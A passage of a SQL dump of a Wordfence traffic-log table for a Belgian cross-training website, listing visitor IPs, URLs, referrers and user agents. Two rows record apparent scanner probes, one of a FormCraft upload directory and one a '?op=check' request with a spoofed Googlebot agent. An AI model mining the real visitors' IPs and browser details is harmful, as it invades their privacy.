(70685, 1493096602.174141, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70686, 1493096602.658555, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70687, 1493096603.153826, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70688, 1493096603.613289, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70689, 1493096751.639083, 520974917, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(70690, 1493097307.610938, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70691, 1493101827.984073, 3652617287, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70692, 1493101864.929690, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70693, 1493105299.180373, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70694, 1493115850.340156, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70695, 1493116168.640029, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70696, 1493123985.946673, 2783008832, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.nl', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70697, 1493123987.131363, 2783008832, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70698, 1493123987.708348, 2783008832, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70699, 1493124011.063711, 2783008832, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70700, 1493124014.708333, 2783008832, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70701, 1493126766.221927, 2661914122, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70702, 1493126767.231793, 2661914122, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(70703, 1493129219.063171, 3342489294, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(70704, 1493129222.999332, 3342489294, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(70705, 1493129225.945737, 3342489294, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(70706, 1493129279.320177, 3342489294, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(70707, 1493135374.280327, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70708, 1493135374.901977, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70709, 1493135375.360064, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70710, 1493135375.812079, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70711, 1493135376.330248, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70712, 1493135376.917418, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70713, 1493135377.458993, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70714, 1493135377.928799, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70715, 1493135378.372262, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70716, 1493135378.798098, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70717, 1493135379.239672, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70718, 1493135379.750746, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70719, 1493135380.203631, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70720, 1493135380.640255, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70721, 1493135422.827554, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70722, 1493140265.281945, 2509960529, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(70723, 1493140800.463065, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(70724, 1493141126.362897, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(70725, 1493144758.342103, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70726, 1493145111.737216, 3585419230, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70727, 1493145123.548743, 3585419230, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70728, 1493145736.137780, 3585419230, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70729, 1493146479.552924, 676177849, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70730, 1493146479.785397, 676177849, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70731, 1493146553.678585, 3475901839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70732, 1493149163.099150, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70733, 1493149163.744443, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70734, 1493149164.234254, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70735, 1493149164.755584, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70736, 1493149165.229354, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70737, 1493149165.729893, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70738, 1493149166.373967, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70739, 1493149166.837494, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70740, 1493149167.334898, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70741, 1493149167.917612, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70742, 1493149168.514470, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70743, 1493149853.287325, 2366158596, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70744, 1493149853.409537, 2996485408, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70745, 1493149859.503072, 2366148270, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70746, 1493153712.647683, 2637637525, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70747, 1493155869.301640, 1538628250, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/689312643.png', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70748, 1493155869.888556, 1538628250, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/689312643.png', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70749, 1493158467.094497, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70750, 1493158469.183057, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70751, 1493158470.466009, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70752, 1493158554.188377, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70753, 1493158778.021875, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70754, 1493158778.640540, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70755, 1493158779.180557, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70756, 1493158779.695883, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70757, 1493159058.792986, 1123632438, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70758, 1493159059.375324, 1123632438, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70759, 1493161085.755914, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70760, 1493164355.073397, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70761, 1493169293.977729, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70762, 1493171709.053295, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/file-upload/server/content/', 'http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/file-upload/server/content/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70763, 1493174168.017668, 3024883476, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(70764, 1493174168.462937, 3024883608, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(70765, 1493174208.991394, 3024883466, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70766, 1493175527.403837, 1123632584, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70767, 1493175528.461828, 1123632437, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70768, 1493177048.732107, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70769, 1493177918.356886, 1338305741, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70770, 1493179731.129881, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70771, 1493180103.600467, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70772, 1493180465.941572, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70773, 1493180877.451321, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70774, 1493181309.362870, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70775, 1493181687.369757, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70776, 1493182063.354640, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70777, 1493182468.636030, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70778, 1493182819.240701, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70779, 1493183125.962859, 1123632437, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70780, 1493183186.413904, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70781, 1493183511.990516, 1123632437, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70782, 1493183888.933650, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70783, 1493183888.935563, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70784, 1493184242.613730, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70785, 1493184582.023551, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70786, 1493184937.481903, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70787, 1493184941.632204, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70788, 1493187658.863615, 676177832, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70789, 1493188563.791587, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70790, 1493189789.162087, 676177832, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70791, 1493190022.029590, 2956707729, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/?op=check', 'http://www.crosstrainingcenter.be/?op=check', 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)'),
(70792, 1493190985.679127, 2637637525, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70793, 1493191002.972914, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(70794, 1493193327.421324, 772029058, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(70795, 1493193332.478952, 772029058, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(70796, 1493199919.798723, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70797, 1493207774.091967, 1123632437, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70798, 1493208554.856970, 3242976508, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjX7s-qi8LTAhWIuRoKHaXMD_UQFggjMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(70799, 1493211639.460979, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70800, 1493211640.253896, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70801, 1493211641.278492, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70802, 1493211641.936125, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70803, 1493211643.142315, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70804, 1493211643.799370, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70805, 1493211644.696572, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70806, 1493211645.446628, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70807, 1493211646.032227, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70808, 1493211646.804614, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
